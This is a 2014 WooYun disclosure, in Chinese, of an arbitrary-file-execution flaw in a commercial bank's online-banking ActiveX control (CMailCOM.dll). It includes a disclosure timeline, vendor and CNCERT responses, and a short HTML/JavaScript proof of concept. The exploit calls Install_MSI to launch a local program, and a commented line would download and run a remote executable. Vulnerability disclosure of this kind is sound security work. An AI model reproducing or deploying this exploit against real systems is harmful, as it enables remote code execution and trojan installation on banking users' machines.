[公开漏洞]某商业银行网银伴侣v2.0.0.0.0.activex任意文件执行漏洞
-
来源:WooYun 浏览:506次 时间:2014-07-05
2014-05-21:细节已通知厂商并且等待厂商处理中
2014-05-26:厂商已经确认,细节仅向厂商公开
2014-06-05:细节向核心白帽子及相关领域专家公开
2014-06-15:细节向普通白帽子公开
2014-06-25:细节向实习白帽子公开
2014-07-05:细节向公众公开
漏洞名称:某商业银行网银伴侣v2.0.0.0.activex任意文件执行漏洞
影响版本:某商业银行网银伴侣v2.0.0.0
验证环境:winxp\win7中文版sp1中文,ie6.0-ie8.0)
问题文件:CMailCOM.dll
问题描述:某商业银行网银伴侣v2.0.0.0.0.activex Install_MSI函数没有对文件执行检查,导致可以远程下载木马或执行本地的任意程序。
中信银行网银伴侣v2.0.0.0.0.activex Install_MSI函数没有对文件执行检查,导致可以远程下载木马或执行本地的任意程序。其中如果“//”注释部分是远程下载ftpfuzz并允许的代码
POC代码:
<html>
<body>
<object classid='clsid:A38F2B9A-2DD3-4C88-86EE-15C01EB565EA' id='target' /></object>
<script>
var str = '';
str = str +'C:\\WINDOWS\\System32\\calc.exe';
//"http://bj.baidupcs.com/file/8afe498c9f126015a70ae0c3ce1a9b63?fid=3675168192-250528-678972838405721&time=1400665296&sign=FDTAXER-DCb740ccc5511e5e8fedcff06b081203-MfWZ2p8aIRiyTWAdPJp9n8qZ9fU%3D&to=bb&fm=N,B,U,nc&newver=1&expires=1400665896&rt=sh&r=805615569&logid=841455764&sh=1&vuk=3675168192&fn=ftpfuzz.exe" ;
target.Install_MSI(str);
</script>
</body>
</html>
修复方案:
版权声明:转载请注明来源 cloud4986@乌云 漏洞回应 厂商回应:
危害等级:中
漏洞Rank:8
确认时间:2014-05-26 14:13
厂商回复:CNVD确认并复现所述情况,转由CNCERT向网站管理单位通报。
最新状态:暂无